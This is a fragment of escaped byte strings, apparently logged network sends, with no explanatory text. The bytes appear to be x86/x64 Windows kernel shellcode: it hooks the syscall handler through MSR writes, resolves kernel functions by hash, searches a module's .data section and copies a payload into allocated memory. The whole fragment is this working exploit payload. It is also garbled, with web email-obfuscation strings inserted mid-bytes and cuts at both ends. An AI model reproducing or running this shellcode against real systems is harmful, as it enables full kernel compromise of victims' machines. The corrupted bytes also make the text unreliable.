\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 17, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\